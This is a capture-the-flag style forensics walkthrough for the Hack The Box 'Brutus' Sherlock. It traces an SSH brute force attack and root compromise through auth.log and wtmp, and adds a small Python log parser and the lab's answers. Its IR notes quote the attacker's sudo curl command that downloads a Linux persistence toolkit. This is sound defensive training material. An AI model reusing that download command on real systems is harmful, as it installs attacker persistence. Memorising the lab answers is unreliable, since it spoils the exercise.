https://app.hackthebox.com/sherlocks/Brutus
Task 1
Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?
The auth.log file is relatively small, so this should be pretty straightforward.
We see a lot of Confluence activity at first, so let's scroll down and see what other information we can get.
We can start to see a flood of failed logins from 65.2.161.68 starting at Mar 6 06:31:31
Task 2
The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
This activity continues, and we can see a transition from attempting to log into the admin user to server_adm, then backup, and finally root.
We can see a successful authentication of the root account from our attacker IP (65.2.161.68).
Task 3
Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
For this task, we need to get a better understanding of what wtmp is and what value it can provide.
If we just try to cat the file we get unreadable output, because wtmp is a binary record file; however, there are other ways to work with it, specifically the who and utmpdump commands.
https://linuxhandbook.com/utmp-wtmp-btmp/
https://man7.org/linux/man-pages/man1/utmpdump.1.html
https://www.geeksforgeeks.org/who-command-in-linux/
If we run who on the wtmp file we can see logins along with a timestamp and IP
Here we can see a root login from 65.2.161.68 and then a login to cyberjunkie.
However, this only gives us the hour and minute of the login, not the seconds.
Even who -a, which prints every field who can show, does not include seconds, so we will need to use utmpdump to get more detail.
Here we can see the first root login from our attacker's IP at 2024-03-06 06:32:45. We had a very similar result in auth.log, but it was 1 second earlier.
Task 4
SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
Back in the auth.log file we can find this answer
Task 5
The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
We can see this in the auth.log as well, just underneath the sign-in
Task 6
What is the MITRE ATT&CK sub-technique ID used for persistence?
Just a quick Google search for "MITRE add local account" gives us our answer:
https://attack.mitre.org/techniques/T1136/001/
Task 7
How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
I did some grepping to narrow the logs down to session 37.
4 minutes 40 seconds = 280 seconds from the auth.log timestamps, but there is that "technically a second after the log shows" issue we ran into in Task 3 (the confirmed wtmp login time is 1 second later), so we have 279 as our answer.
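The checks from Tasks 1, 2, 4 and 7 as a small Python script, added here as an example rather than taken from the original writeup. It runs over a constructed auth.log excerpt (the lines, hostname and PIDs are made up, although the attacker IP, session number and login time echo the walkthrough); the login_ts parameter models the one-second wtmp offset from Task 3.

```python
import re
from collections import Counter
from datetime import datetime
# Constructed sample in the sshd/systemd-logind auth.log format analysed above; the
# lines are made up for this example (hostname invented), not the Sherlock evidence.
SAMPLE_AUTH_LOG = """\
Mar  6 06:31:31 host sshd[2325]: Failed password for admin from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:33 host sshd[2327]: Failed password for invalid user server_adm from 65.2.161.68 port 46400 ssh2
Mar  6 06:31:35 host sshd[2329]: Failed password for backup from 65.2.161.68 port 46412 ssh2
Mar  6 06:31:40 host sshd[2331]: Failed password for root from 198.51.100.7 port 51000 ssh2
Mar  6 06:32:44 host sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 host systemd-logind[411]: New session 37 of user root.
Mar  6 06:37:24 host systemd-logind[411]: Removed session 37.
"""
# Syslog prefix: timestamp (no year) and hostname, then the logging process.
TS = r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ "
FAILED = re.compile(TS + r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
ACCEPTED = re.compile(TS + r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")
NEW_SESSION = re.compile(TS + r"systemd-logind\[\d+\]: New session (?P<sid>\d+) of user (?P<user>\S+)\.")
REMOVED = re.compile(TS + r"systemd-logind\[\d+\]: Removed session (?P<sid>\d+)\.")

def parse_ts(ts, year=2024):
    # Syslog stamps carry no year; the analyst supplies it (2024 for this case).
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def failed_logins_by_ip(log):
    """Task 1: failed passwords per source IP; the brute forcer dominates the count."""
    return Counter(m["ip"] for line in log.splitlines() if (m := FAILED.match(line)))

def accepted_logins(log):
    """Task 2: (user, ip, timestamp) for every successful authentication."""
    return [(m["user"], m["ip"], m["ts"]) for line in log.splitlines() if (m := ACCEPTED.match(line))]

def sessions_for_user(log, user):
    """Task 4: systemd-logind session numbers opened for the given user."""
    return [int(m["sid"]) for line in log.splitlines() if (m := NEW_SESSION.match(line)) and m["user"] == user]

def session_duration(log, sid, login_ts=None):
    """Task 7: seconds from session start to removal; login_ts ('YYYY-MM-DD HH:MM:SS') replaces the start with the wtmp time."""
    start = end = None
    for line in log.splitlines():
        if (m := NEW_SESSION.match(line)) and int(m["sid"]) == sid:
            start = parse_ts(m["ts"])
        elif (m := REMOVED.match(line)) and int(m["sid"]) == sid:
            end = parse_ts(m["ts"])
    if start is None or end is None:
        return None  # session never opened or never closed in this log
    if login_ts is not None:
        start = datetime.strptime(login_ts, "%Y-%m-%d %H:%M:%S")
    return int((end - start).total_seconds())
```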
Task 8
The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
Another fairly straightforward answer towards the bottom of the logs
Bonus: What does the script do?
We don’t see any additional commands being run by the attacker, but it will be a good idea to at least know what activity we could be looking for in the future.
This is part of the Linux Persistence Toolkit
Its documentation describes the script's usage as well as countermeasures.
In most cases we wouldn't get this lucky, where the privilege escalation script we find tells us how to detect it, but in this case we have it. The documentation is also just a good general list for identifying privilege escalation.
Post IR Info
- Confluence IP: 172.31.35.28
- First failed login: Mar 6 06:31:31
- Attacker IP: 65.2.161.68
- Compromised account: root
- Root login time (auth.log): Mar 6 06:32:44
- cyberjunkie account created: Mar 6 06:34:18
- Privilege escalation script: /usr/bin/curl hxxps://raw[.]githubusercontent[.]com/montysecurity/linper/main/linper.sh
- Script download time: Mar 6 06:39:38